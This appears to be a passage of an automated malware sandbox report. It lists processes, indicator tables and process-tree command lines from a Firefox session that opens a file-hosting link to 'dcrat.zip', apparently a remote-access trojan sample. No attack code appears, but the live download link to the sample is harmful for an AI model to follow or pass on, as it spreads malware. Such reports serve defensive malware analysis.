2028	blockwinref.exe
2028	blockwinref.exe
2028	blockwinref.exe
2028	blockwinref.exe
2028	blockwinref.exe
2028	blockwinref.exe
2028	blockwinref.exe
2028	blockwinref.exe
2028	blockwinref.exe
2028	blockwinref.exe
2028	blockwinref.exe
7328	dwm.exe
7328	dwm.exe
7328	dwm.exe
7328	dwm.exe
7328	dwm.exe
7328	dwm.exe
7328	dwm.exe
7328	dwm.exe
7328	dwm.exe
7720	backgroundTaskHost.exe
7720	backgroundTaskHost.exe
7720	backgroundTaskHost.exe
7720	backgroundTaskHost.exe
7720	backgroundTaskHost.exe
7720	backgroundTaskHost.exe
7720	backgroundTaskHost.exe
7720	backgroundTaskHost.exe
7720	backgroundTaskHost.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

Processes:

firefox.exedwm.exejavaw.exebackgroundTaskHost.exe

pid process

7560 firefox.exe
7328 dwm.exe
1756 javaw.exe
7720 backgroundTaskHost.exe

pid	process
7560	firefox.exe
7328	dwm.exe
1756	javaw.exe
7720	backgroundTaskHost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

firefox.exeAUDIODG.EXEfirefox.exefirefox.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: 33	7208	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	7208	AUDIODG.EXE
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	7528	firefox.exe
Token: SeDebugPrivilege	7528	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	7560	firefox.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeIncreaseQuotaPrivilege	3352	WMIC.exe
Token: SeSecurityPrivilege	3352	WMIC.exe
Token: SeTakeOwnershipPrivilege	3352	WMIC.exe
Token: SeLoadDriverPrivilege	3352	WMIC.exe
Token: SeSystemProfilePrivilege	3352	WMIC.exe
Token: SeSystemtimePrivilege	3352	WMIC.exe
Token: SeProfSingleProcessPrivilege	3352	WMIC.exe
Token: SeIncBasePriorityPrivilege	3352	WMIC.exe
Token: SeCreatePagefilePrivilege	3352	WMIC.exe
Token: SeBackupPrivilege	3352	WMIC.exe
Token: SeRestorePrivilege	3352	WMIC.exe
Token: SeShutdownPrivilege	3352	WMIC.exe
Token: SeDebugPrivilege	3352	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3352	WMIC.exe
Token: SeRemoteShutdownPrivilege	3352	WMIC.exe
Token: SeUndockPrivilege	3352	WMIC.exe
Token: SeManageVolumePrivilege	3352	WMIC.exe
Token: 33	3352	WMIC.exe
Token: 34	3352	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

firefox.exe

pid	process
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe

Suspicious use of SendNotifyMessage 58 IoCs

Processes:

firefox.exefirefox.exefirefox.exe

pid	process
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
7560	firefox.exe
7560	firefox.exe
3368	firefox.exe
3368	firefox.exe

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

firefox.exefirefox.exefirefox.exejavaw.exe

pid	process
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
7528	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
7560	firefox.exe
1756	javaw.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	process	target process
PID 4704 wrote to memory of 4428	4704	firefox.exe	firefox.exe
PID 4704 wrote to memory of 4428	4704	firefox.exe	firefox.exe
PID 4704 wrote to memory of 4428	4704	firefox.exe	firefox.exe
PID 4704 wrote to memory of 4428	4704	firefox.exe	firefox.exe
PID 4704 wrote to memory of 4428	4704	firefox.exe	firefox.exe
PID 4704 wrote to memory of 4428	4704	firefox.exe	firefox.exe
PID 4704 wrote to memory of 4428	4704	firefox.exe	firefox.exe
PID 4704 wrote to memory of 4428	4704	firefox.exe	firefox.exe
PID 4704 wrote to memory of 4428	4704	firefox.exe	firefox.exe
PID 4704 wrote to memory of 4428	4704	firefox.exe	firefox.exe
PID 4704 wrote to memory of 4428	4704	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 1880	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 4792	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 4792	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 4792	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 4792	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 4792	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 4792	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 4792	4428	firefox.exe	firefox.exe
PID 4428 wrote to memory of 4792	4428	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://www.upload.ee/files/16597642/dcrat.zip.html"
1⤵
- Suspicious use of WriteProcessMemory
PID:4704
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://www.upload.ee/files/16597642/dcrat.zip.html
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4428
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1912 -parentBuildID 20240401114208 -prefsHandle 1848 -prefMapHandle 1840 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0f6cfd1-fb2d-450e-80bb-dc894dee213a} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" gpu
    3⤵
    PID:1880
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2348 -parentBuildID 20240401114208 -prefsHandle 2340 -prefMapHandle 2336 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d55e755-6afb-47b0-89e7-5c5f389217fc} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" socket
    3⤵
    - Checks processor information in registry
    PID:4792
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3028 -childID 1 -isForBrowser -prefsHandle 3032 -prefMapHandle 3324 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5206bfd8-b815-4b1c-a707-d43a0309e14e} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:2472
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2808 -childID 2 -isForBrowser -prefsHandle 3640 -prefMapHandle 3636 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48856f72-05d7-4f9e-8845-14a59c2fa238} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:2392
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4772 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4764 -prefMapHandle 4760 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ae5feb0-9898-490e-a958-2c1000492e7e} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" utility
    3⤵
    - Checks processor information in registry
    PID:4172
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5544 -childID 3 -isForBrowser -prefsHandle 4932 -prefMapHandle 5008 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {36f13b74-ee77-4293-8bfb-c86ea7f66b29} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:860
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 4 -isForBrowser -prefsHandle 4920 -prefMapHandle 5560 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2a308f68-5409-42ee-ae2e-d9fd3836c1a3} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:4492
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4796 -childID 5 -isForBrowser -prefsHandle 5960 -prefMapHandle 5684 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {47ac4d64-3115-4181-81b1-aa0065026db3} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:1352
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6064 -childID 6 -isForBrowser -prefsHandle 5480 -prefMapHandle 5472 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48d5f7d9-1d35-4cf7-8cd4-c7ee47c8d1c7} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:5032
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6172 -childID 7 -isForBrowser -prefsHandle 6180 -prefMapHandle 6184 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d56a190-04b3-4bbc-b41b-b1b743fcf382} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:3408
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6036 -childID 8 -isForBrowser -prefsHandle 6440 -prefMapHandle 6444 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba003fb9-bec6-49d4-82b9-035f1ca201ff} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:4968
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6676 -childID 9 -isForBrowser -prefsHandle 6656 -prefMapHandle 6664 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6ac7af2b-6881-469c-a892-67620e6b8856} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:2732
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4240 -childID 10 -isForBrowser -prefsHandle 3596 -prefMapHandle 3964 -prefsLen 30194 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b3a8417-b0f9-4e34-be80-5de2379a048f} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:1068
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6128 -childID 11 -isForBrowser -prefsHandle 6776 -prefMapHandle 6644 -prefsLen 30559 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {501fa960-2b83-4ef4-9155-56cd5898c6a2} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:1176
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6184 -childID 12 -isForBrowser -prefsHandle 5544 -prefMapHandle 6240 -prefsLen 30998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {219cabeb-13e0-494f-9b0c-8303f4928ec1} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6368
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7428 -childID 13 -isForBrowser -prefsHandle 6340 -prefMapHandle 3432 -prefsLen 34052 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0860c6e3-992d-4f6f-97af-beaebc1adad3} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6424
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2224 -childID 14 -isForBrowser -prefsHandle 2232 -prefMapHandle 7516 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11b757a9-519a-4752-b172-f7c08e824129} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6544
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 15 -isForBrowser -prefsHandle 5916 -prefMapHandle 5912 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a0cffed-257f-44fb-bf61-509ac9e07a8e} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:5596
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4932 -childID 16 -isForBrowser -prefsHandle 6004 -prefMapHandle 5792 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d5372cb-eaf2-4395-94cc-bd04f5a6ba06} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:3640
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3856 -parentBuildID 20240401114208 -prefsHandle 7596 -prefMapHandle 3944 -prefsLen 34131 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e305923-6284-47fe-b164-a17dde6e9c66} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" rdd
    3⤵
    PID:5792
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3428 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 3476 -prefMapHandle 3528 -prefsLen 34131 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2db4445-30c3-4c6a-b210-0688fe95a560} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" utility
    3⤵
    - Checks processor information in registry
    PID:4152
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7852 -childID 17 -isForBrowser -prefsHandle 7864 -prefMapHandle 7860 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40ac05e9-ea67-476b-bb32-32c57a1be3b5} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:5388
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7888 -childID 18 -isForBrowser -prefsHandle 7164 -prefMapHandle 8176 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {70153718-dec8-4382-a11d-d28feff8e2c7} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6148
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8316 -childID 19 -isForBrowser -prefsHandle 8324 -prefMapHandle 8328 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b97c607-da97-4a7a-a1a5-ea6daf8ddf84} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6336
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8416 -childID 20 -isForBrowser -prefsHandle 8408 -prefMapHandle 8220 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f779981-35ff-4040-9384-8488158387ac} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6392
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8880 -childID 21 -isForBrowser -prefsHandle 8872 -prefMapHandle 8868 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46e03926-507c-4ae6-adb8-9b52efa64a42} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6164
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9132 -childID 22 -isForBrowser -prefsHandle 9124 -prefMapHandle 9120 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a94db03-00f1-4558-9063-b8e0216ff34a} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6352
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9204 -childID 23 -isForBrowser -prefsHandle 8168 -prefMapHandle 8180 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7ab334a-9e91-404c-99b3-5168653e23c0} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:5212
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8732 -childID 24 -isForBrowser -prefsHandle 9320 -prefMapHandle 9316 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f35daedb-ed57-4c77-a278-b98148250770} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6892
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9448 -childID 25 -isForBrowser -prefsHandle 9456 -prefMapHandle 9460 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1de88478-05fe-45a2-9031-6f96308745a1} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6868
- - C:\Program Files\Mozilla Firefox\firefox.exe
